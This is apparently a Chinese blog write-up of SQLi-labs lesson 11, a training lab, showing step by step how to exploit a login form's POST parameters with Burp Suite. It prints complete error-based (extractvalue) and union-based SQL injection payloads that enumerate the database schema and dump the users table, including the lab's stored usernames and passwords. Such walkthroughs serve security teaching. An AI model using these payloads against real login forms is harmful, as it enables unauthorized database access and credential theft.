zoukankan      html  css  js  c++  java
  • Less(11)

    1.我们用burpsuit,抓包修改参数

      (1)输入admin admin登录,抓包,发送到repeater模块

    2.使用extractvalue 测试 payload

      (1)输入:uname=admin' and 1=1 --+ &passwd=admin&submit=Submit

        

         可以登录

      (2)输入:uname=admin' and 1=2 --+ &passwd=admin&submit=Submit

        

         发现无法登录

        说明注入有效,存在报错型注入,接下来又是重复性的工作,上extractvalue()

      (3)爆库:uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+ &passwd=admin&submit=Submit

        

       (4)爆表:uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ &passwd=admin&submit=Submit

         

       只能查询到前几个表,后面加上 not in() 就可以查到其他的表了,如:uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not in('emails')))) --+ &passwd=admin&submit=Submit

        

       (5)这里没有发现更多的表了,而users表应该是存放用户信息的,所以我们进行下一步,爆列名:uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+ &passwd=admin&submit=Submit

        

        因为没有咱们需要的password,username,把一些不需要的列名消除掉:uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) --+ &passwd=admin&submit=Submit

        

         我们发现后面确实有咱们需要的password,username

      (6)爆值:uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+ &passwd=admin&submit=Submit

        

         通过 not in(),我们可以找到所有的用户名和密码

        

        Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

    3.联合查询union select 测试payload

      (1)uname=0' union select 1,2 --+ &passwd=admin&submit=Submit 

        注意 uname是错误的,才能显示联合查询内容

        

        可以注入;

      (2)爆库:uname=0' union select 1,database() --+ &passwd=admin&submit=Submit

        

      (3)爆表:uname=0' union select 1,group_concat(table_name)from information_schema.tables where table_schema="security" --+ &passwd=admin&submit=Submit

         

       (4)users表应该是存放用户信息的,所以我们进行下一步,爆列名:uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" --+ &passwd=admin&submit=Submit

        

         确实有username和password;

      (5)爆值:uname=0' union select 1,group_concat(username,0x3a,password) from users --+ &passwd=admin&submit=Submit

        

         这样我们也可以看到所有的登录用户和密码:

        Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

          

  • 相关阅读:
    多线程关键字
    Atomic原子类
    FFmpeg滤镜代码级分析
    YUV420数据和字符信息如何利用滤镜方法进行编码?
    FFmpeg音视频编解码实践总结
    Android高手应该精通哪些内容
    CentOs 设置静态IP 方法
    花了5天时间,终于解决了一个bug,心情非常愉快,憋了这么久,不吐不快
    H264视频通过RTMP直播
    程序移植到VS2010,编译成功但是无法启动lib文件
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12284496.html
Copyright © 2011-2022 走看看